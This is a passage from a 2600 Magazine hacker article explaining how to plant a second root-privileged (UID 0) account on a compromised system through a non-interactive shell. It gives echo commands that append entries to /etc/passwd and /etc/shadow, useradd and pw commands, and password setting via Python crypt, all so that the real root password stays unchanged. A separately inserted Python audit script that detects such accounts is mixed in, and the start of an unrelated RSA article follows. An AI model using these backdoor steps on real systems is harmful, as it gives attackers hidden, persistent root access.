2600 Magazine_ The Hacker Quarterly - Digital Edition - Summer 2011 - 2600 Magazine [20]
Let's Do It!
The first method to add a user non-interactively is very simple. Add a user to your own system with a password and the group membership you want, then copy and echo the lines for that user from your passwd and shadow file into /etc/passwd and /etc/shadow on the target system. I'll show you how to add a user that shares a group/userid with root in the next section, but a quick note on how: you'll want to add a user to your system with the same privileges/memberships as root.
Example: When I created a user called “test” on my system with a password of "password", this is what that user’s line looked like in my passwd/shadow files:
my /etc/passwd:
test:x:0:0::/home/test:/bin/sh
my /etc/shadow:
test:$6$aae8qp/j$r0c.HGGbDsIRRLc4x2htq588feJ3rsjzFvZOd/nawNkpA.D.kLzzAZA4UhfMc7zU8B13WuFu8oC8eKrXxaYxa/:14929:0:99999:7:::
On the system you have non-interactive access on, simply do this:
echo 'test:x:0:0::/home/test:/bin/sh' >> /etc/passwd
echo 'test:$6$aae8qp/j$r0c.HGGbDsIRRLc4x2htq588feJ3rsjzFvZOd/nawNkpA.D.kLzzAZA4UhfMc7zU8B13WuFu8oC8eKrXxaYxa/:14929:0:99999:7:::' >> /etc/shadow
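From the auditing side, an account added this way stands out because it shares UID 0 with root. The following Python check is an added example, not code from the original article; the function names and the sample passwd/shadow lines (with placeholder hash fields) are constructed for illustration.

```python
# Added example: audit passwd/shadow text for accounts that share UID 0 with root.
# All sample lines are constructed; hash fields are placeholders.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
test:x:0:0::/home/test:/bin/sh
svc:x:00:0::/home/svc:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
"""
SAMPLE_SHADOW = """\
root:$6$SALT$PLACEHOLDER:14900:0:99999:7:::
test:$6$SALT$PLACEHOLDER:14929:0:99999:7:::
svc:!:14929:0:99999:7:::
ghost:$6$SALT$PLACEHOLDER:14929:0:99999:7:::
"""

def records(text, min_fields):
    """Yield colon-split fields for each well-formed, non-comment line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) >= min_fields and not fields[0].startswith("#"):
            yield fields

def password_state(field):
    """Classify a shadow password field (None means the user has no entry)."""
    if field is None:
        return "no shadow entry"
    if field == "":
        return "empty password"
    if field[0] in "!*":
        return "locked"
    return "hash set"

def audit(passwd_text, shadow_text):
    """Return sorted (user, finding) pairs for suspicious account entries."""
    shadow = {f[0]: f[1] for f in records(shadow_text, 2)}
    findings, seen = [], set()
    for f in records(passwd_text, 7):
        name, uid = f[0], f[2]
        seen.add(name)
        # Compare numerically so a zero-padded value such as "00" is not missed.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((name, "UID 0, " + password_state(shadow.get(name))))
    findings += [(n, "shadow entry without passwd entry") for n in shadow if n not in seen]
    return sorted(findings)

if __name__ == "__main__":
    for user, finding in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(user + ": " + finding)
```

On a live system, pass it the contents of /etc/passwd and /etc/shadow (reading the latter requires root).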
The second method is a bit more involved, but it can also be used or modified to script adding users or changing their passwords non-interactively. This method also demonstrates using the Python crypt library and is a good way to learn some *nix administration.
For systems that support the useradd (not adduser) command, do the following:
useradd username -o -u 0 -g 0
The -o switch allows multiple users to have the same uid/gid (0 is root). The user will have no password at the moment. In normal operation you’d simply issue the passwd command, but this will not work with a non-interactive shell. Assuming you have access to a system with Python installed (and since the system you’re logging in from is BackTrack 4 R1, I know it’s got Python!), simply enter python and hit return.
Now you’re at the >>> prompt. Type in import crypt; print and hit enter. Next, type crypt.crypt( The output you’ll receive will be the encrypted password. Copy it down. Now type the following and hit enter:
usermod -p encrypted_password username
This assigns your new user a password. Now you can ssh in and have full interactive root access to the system, and root’s password is unchanged.
For systems that support the pw command (FreeBSD for example), the steps are similar but the commands are a tad different. I fooled around a bit and found a working set of commands.
pw useradd -o -u 0 -g 0 -n username
The above adds the user with no password. The steps are the same for generating the encrypted password, so use python and crypt from above and copy the output. Then enter
echo encrypted_password | pw usermod -n username -h 0
The above command assigns the password to the user. Now, just as before, you have an account with root privileges, but the system’s root account is unchanged.
You may ask yourself, "Why would I choose the second method rather than the first, simple echo method?" In most cases, you'll find the first method will work just fine. But the second method may be helpful if you're experimenting with scripting user add/modify actions or in some strange instance when you don't have the ability to echo commands into the passwd/shadow files.
I hope you find this useful. Good luck and happy hacking!
* * *
Simple RSA Encryption or Human-Calculable Encryption
At first glance, learning cryptography can be as tedious and time-consuming as many other things in life, just as learning a new language can be difficult while you get familiar with the strange syntax. There are different kinds of cryptographic methods, one of them being the RSA public key cryptosystem.
by b3ard